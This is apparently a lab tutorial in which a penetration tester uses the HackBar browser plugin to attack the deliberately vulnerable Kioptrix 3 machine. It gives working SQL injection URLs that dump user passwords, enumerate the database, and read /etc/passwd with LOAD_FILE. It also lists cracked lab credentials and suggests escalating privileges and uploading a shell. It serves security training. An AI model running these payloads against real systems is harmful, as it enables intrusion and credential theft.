The Iceweasel browser provides penetration testers with a myriad of tools that make web application testing efficient and fun. It takes advantage of many of the browser-based plugins that have been written over the years. We will use the plugin HackBar within Iceweasel to fully exploit the Kioptrix 3 machine in our lab in an efficient manner. The primary plugin we take advantage of in this example is the HackBar. You can learn more about HackBar at https://addons.mozilla.org/en-US/firefox/addon/hackbar/. The HackBar and other add-ons that can be added to Iceweasel make testing web applications fun and allow a knowledgeable penetration tester to manually verify the security of a web application.
Open the Iceweasel browser and click on Open menu | Add-ons, located on the right-hand side of the screen next to the home icon. In the Search all add-ons field, enter HackBar and search for the tool; once it is found, install it and restart the browser:
- Using the HackBar in Iceweasel, enter the following URL and click on the Execute button:
http://kioptrix3.com/gallery/gallery.php?id=null+and+1=2+union+select+1,group_concat(userid,0x3a,username,0x3a,password),3,4,5,6+from+gallarific_users--
- You should be presented with the username
adminand the passwordn0t7t1k4. - Let's take a look at how we can get other information. Enter the following into the HackBar:
http://kioptrix3.com/gallery/gallery.php?id=1and click on Execute. - Now, place the cursor at the end of the
http://kioptrix3.com/gallery/gallery.php?id=1entry in the HackBar, add a space, and then directly above the HackBar click SQL | Union Select Statement and enter6in the pop up that appears. Then, click on OK. Click on the HackBar Execute button to verify that the SQL injection works. - Now, replace the number
2in the query that was generated, by highlighting it and clicking on SQL | MySQL | Basic Info Column, so that your URL now looks like this:http://kioptrix3.com/gallery/gallery.php?id=1 UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),@@version),3,4,5,6. Click on Execute on the HackBar and review the results. The output should contain the following information:root@localhost:gallery:5.0.51a-3ubuntu5.4. You have successfully enumerated the user, database name, and version that are running. - At this point, you can use any of the typical SQL injection tricks to enumerate this database. Try running different commands such as
http://kioptrix3.com/gallery/gallery.php?id=1 UNION SELECT 1,table_name,3,4,5,6frominformation_schema.tableswheretable_schema=database(), which will list all of the tables from the current database. - We can already access certain files on the server using commonly used SQL injection code such as
http://kioptrix3.com/gallery/gallery.php?id=1 UNION SELECT 1,LOAD_FILE('/etc/passwd'),3,4,5,6. This will list the password file from the server. - To pull the development user's account information, we can use
http://kioptrix3.com/gallery/gallery.php?id=1 UNION SELECT 1,username,password,4,5,6 from dev_accounts,which provides us with the information for the usernameloneferret, with a password hash value of5badcaf789d3d1d09794d8f021f40f0e, and the userdreg, with a password hash of0d3eccfb887aabd50f243b3f155c0f85. We can try to crack these user passwords. Successfully cracking the passwords will provide you with the following credentials:dreg-Mast3randloneferret-starwars.
These users have fallen into the pitfall of reusing passwords. You can log onto the Kioptrix 1.2 machine on your lab now by opening up an SSH session from your Kali to the Kioptrix machine. Luckily, these accounts are not in the sudoers list. Now, we need to elevate the privilege of one of the accounts.
Tip
At this point, you are almost at root on the Kioptrix Level 1.2 machine. Take your time, look around the server and try to figure out a method of escalating the privilege of either user.
Once you have gained root using SSH, challenge yourself again by uploading a shell to the Kioptrix Level 1.2 machine using nothing but the website! There are several different methods of accomplishing this; if you get stuck, take a look at one of the many walkthroughs on the Web.